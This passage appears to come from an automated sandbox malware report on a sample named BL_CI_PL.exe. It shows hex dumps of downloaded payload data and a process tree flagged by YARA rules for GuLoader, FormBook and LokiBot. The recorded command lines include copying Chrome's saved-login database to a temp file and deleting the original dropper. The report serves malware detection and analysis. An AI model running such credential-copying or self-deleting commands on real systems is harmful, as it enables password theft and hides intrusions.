69 38 32 77 7d c2 b1 95 2b a3 28 45 92 39 e0 88 78 3d a8 9b 1a cc f2 3f 43 b9 30 a7 b7 43 af 01 1e a5 e8
                                                                                                                                                    Data Ascii: -\,&\oMQ!#(U,T5g-v'\)0m(9CumPJvi5MJ;X:>);!e2s^Kf3sGmeW ,9R,I.t36}P'10CTWg-oznD^3Xi'V`GMci82w}+(E9x=?C0C
                                                                                                                                                    2021-11-29 13:11:15 UTC437INData Raw: 72 5b 90 44 65 8e 70 a6 f5 45 65 e3 64 29 97 e7 86 b3 d6 21 49 61 d6 41 f2 25 cf ff 87 be b8 cb 71 58 18 2b d8 aa 72 cc 0b 54 cc 85 16 98 ab 3c 57 56 3f ef 58 81 90 69 75 63 89 a4 65 57 91 fb 7a 8e 09 06 85 c9 d2 97 6f f2 9c 5b 95 00 cb a0 e5 64 a6 78 37 40 01 93 bc b0 c0 14 2b 7c 8f 3a 5f cf 09 d0 63 e7 6f 62 4a 7c 5f e5 60 ed 52 8c 81 a5 cd a4 99 b6 4d 0a 09 3a 1f d5 47 9e 51 70 26 c4 03 65 4a 62 5d 69 97 09 9e 01 81 78 28 e9 48 f7 4f d7 93 b2 46 f4 ad 5a d6 24 84 a0 73 28 ff 86 bc 54 b9 e6 ff ed 04 0f 7f 62 79 90 87 2d d5 3a 9b 34 57 10 80 c0 9d 29 08 5f 47 65 09 de 49 d8 31 b4 2a d3 31 4c 5c 70 34 9d 09 e1 16 70 15 85 3c 2d 2c 0c bd c6 72 bf af e2 87 fb f0 de 24 c5 0b 02 18 d8 8e cd c8 57 3f 6a fe fe 78 ce fc 52 34 5a 9d fb 1a e4 4c 17 89 83 44 aa 26
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:11:15 UTC445INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:11:15 UTC453INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:11:15 UTC461INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
                                                                                                                                                    2021-11-29 13:11:15 UTC468INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
                                                                                                                                                    2021-11-29 13:11:15 UTC476INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:11:15 UTC484INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    Analysis Process: BL_CI_PL.exe PID: 1880 Parent PID: 7284

                                                                                                                                                    General

                                                                                                                                                    Start time:14:04:10
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.25496832496.0000000002B30000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: BL_CI_PL.exe PID: 432 Parent PID: 1880

                                                                                                                                                    General

                                                                                                                                                    Start time:14:04:48
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000A.00000000.25494294503.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.26197526240.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.26187169960.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: explorer.exe PID: 4528 Parent PID: 432

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:26
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                    Imagebase:0x7ff6269f0000
                                                                                                                                                    File size:4849904 bytes
                                                                                                                                                    MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.25948108416.000000001225A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000000.26001641148.000000001225A000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: ipconfig.exe PID: 4888 Parent PID: 432

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:58
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                                                                    Imagebase:0x2e0000
                                                                                                                                                    File size:29184 bytes
                                                                                                                                                    MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.30163222370.0000000003591000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30162544062.00000000034A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000E.00000002.30170515202.0000000003F37000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30161003115.0000000002F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.30162209821.0000000003450000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 384 Parent PID: 4888

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:59
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\BL_CI_PL.exe"
                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                    File size:236544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 400 Parent PID: 384

                                                                                                                                                    General

                                                                                                                                                    Start time:14:05:59
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7ac720000
                                                                                                                                                    File size:875008 bytes
                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: cmd.exe PID: 4948 Parent PID: 4888

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:46
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
                                                                                                                                                    Imagebase:0xff0000
                                                                                                                                                    File size:236544 bytes
                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: conhost.exe PID: 5780 Parent PID: 4948

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:46
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff7ac720000
                                                                                                                                                    File size:875008 bytes
                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 5888 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:47
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000002.28872866748.0000000002A70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:low

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: firefox.exe PID: 7688 Parent PID: 4888

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:47
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                    Imagebase:0x7ff710730000
                                                                                                                                                    File size:597432 bytes
                                                                                                                                                    MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000000.28530443036.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000002.28535963674.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, Author: Florian Roth
                                                                                                                                                    Reputation:moderate

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 5096 Parent PID: 4528

                                                                                                                                                    General

                                                                                                                                                    Start time:14:09:56
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:Visual Basic
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 3200 Parent PID: 5888

                                                                                                                                                    General

                                                                                                                                                    Start time:14:10:26
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.29297997278.0000000000060000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.29308978979.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001A.00000000.28869456297.0000000000560000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                    Chronological Activities

                                                                                                                                                    Analysis Process: k4n8p7lb.exe PID: 5788 Parent PID: 5096

                                                                                                                                                    General

                                                                                                                                                    Start time:14:10:35
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:143360 bytes
                                                                                                                                                    MD5 hash:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000000.28960622366.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.29462821134.000000001E520000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, Author: Joe Security
